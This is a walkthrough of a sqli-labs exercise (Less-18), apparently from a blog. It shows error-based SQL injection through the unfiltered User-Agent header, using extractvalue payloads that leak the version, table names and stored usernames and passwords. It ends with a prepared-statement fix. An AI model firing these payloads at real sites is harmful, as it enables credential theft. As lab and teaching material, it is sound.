extractvalue error injection

Look at the source code:

$uagent = $_SERVER['HTTP_USER_AGENT'];    // User-Agent header, taken verbatim; never passed through check_input()

…………

$uname = check_input($_POST['uname']);     // filtered
$passwd = check_input($_POST['passwd']);   // filtered

…………

$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1)
    {
    echo '<font color= "#FFFF00" font size = 3 >';
    // $uagent is interpolated straight into the INSERT: this is the injection point
    $insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
    mysql_query($insert);

From the source, $uname and $passwd are passed through check_input(), so there is no injection point in the SELECT. But the INSERT INTO statement that follows also writes $uagent, $IP and $uname to the database, and as the source shows, $uagent is not filtered at all, so $uagent can be tried as the injection point.

Capturing the request in Burp Suite gives the following:

POST /sqli-labs-master/Less-18/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/sqli-labs-master/Less-18/
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Connection: close
Cookie: 24b16fede9a67c9251d3e7c7161c83ac_ci_session=ils5p93b6rohhin07b46h1s2hmp08gvq
Upgrade-Insecure-Requests: 1

uname=admin&passwd=admin&submit=Submit

The value after User-Agent: in the request is where $uagent comes from, so we can modify that value to look for the injection point.

User-Agent: '

An error is returned.

User-Agent: " (double quote)

No error.

User-Agent: ' #

(After testing, none of #, -- + and %23 can comment out the trailing ': the rest of the VALUES list would be cut off, so the INSERT still fails with a syntax error.)

User-Agent: '' (two single quotes)

Since the trailing ' cannot be commented out, add another ' to close it instead.

Next, build a statement that uses extractvalue to trigger an error-based query:

' and extractvalue(1,concat(0x7e,(select @@version),0x7e)) and '

For ease of understanding, the quotes are closed in the following way instead:

Query the version

' and extractvalue(1,concat(0x7e,(select @@version),0x7e)) and '1'='1 

Query the current database

' and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '1'='1

Query the tables

' and extractvalue(1,concat(0x7e,(select  table_name from information_schema.tables where table_schema='security'),0x7e)) and '1'='1

This fails because the subquery returns more than one row; extractvalue needs a single value.

Solution one: list all tables at once with group_concat

' and extractvalue(1,concat(0x7e,(select group_concat( table_name) from information_schema.tables where table_schema='security'),0x7e)) and '1'='1

Solution two: return one table at a time with LIMIT

' and extractvalue(1,concat(0x7e,(select  table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e)) and '1'='1

Query the column contents

' and extractvalue(1,concat(0x7e,(select group_concat(id,username,password) from security.users ),0x7e)) and '1'='1 

extractvalue, and the similar updatexml, can only display 32 characters in the error message.
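As an added example (not the lab's or the original post's code): the vulnerable INSERT from the source above, rewritten with a mysqli prepared statement so the User-Agent header can no longer change the SQL. It assumes an open mysqli connection `$con` to the `security` database and that `$IP` comes from REMOTE_ADDR, and it stands in for the `mysql_query($insert)` call after the login lookup.

```php
<?php
// Added example, not from sqli-labs: the uagents INSERT rewritten with a
// mysqli prepared statement. Assumes $con is an open mysqli connection to
// the `security` database and $row1 is the login lookup result from the
// surrounding code; $IP from REMOTE_ADDR is an assumption, since the
// excerpt above does not show where it is set.

function log_user_agent(mysqli $con, string $uagent, string $ip, string $uname): bool
{
    // ? placeholders replace the interpolated '$uagent', '$IP' and $uname,
    // so the header text reaches MySQL as a value, never as SQL. A
    // User-Agent of  ' and extractvalue(1,concat(0x7e,(select @@version),0x7e)) and '
    // is simply stored as that literal string.
    $stmt = $con->prepare(
        'INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES (?, ?, ?)'
    );
    if ($stmt === false) {
        // Log server-side only: echoing the MySQL error to the page is what
        // turns extractvalue's XPath error into a data channel.
        error_log('prepare failed: ' . $con->error);
        return false;
    }
    $stmt->bind_param('sss', $uagent, $ip, $uname);
    $ok = $stmt->execute();
    if (!$ok) {
        error_log('insert failed: ' . $stmt->error);
    }
    $stmt->close();
    return $ok;
}

// Same inputs as the original code path. The raw POST value is bound
// directly: the placeholder supplies the quoting that check_input() added.
$uagent = $_SERVER['HTTP_USER_AGENT'] ?? '';
$IP     = $_SERVER['REMOTE_ADDR'] ?? '';
$uname  = $_POST['uname'] ?? '';

// Called where the original does mysql_query($insert), i.e. only after
// the login lookup found a row.
if (!empty($row1)) {
    log_user_agent($con, $uagent, $IP, $uname);
}
```

The same change applies to the SELECT: binding $uname and $passwd as parameters removes the need for check_input() to do the escaping.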

Source: www.cnblogs.com/Hunter-01001100/p/11371969.html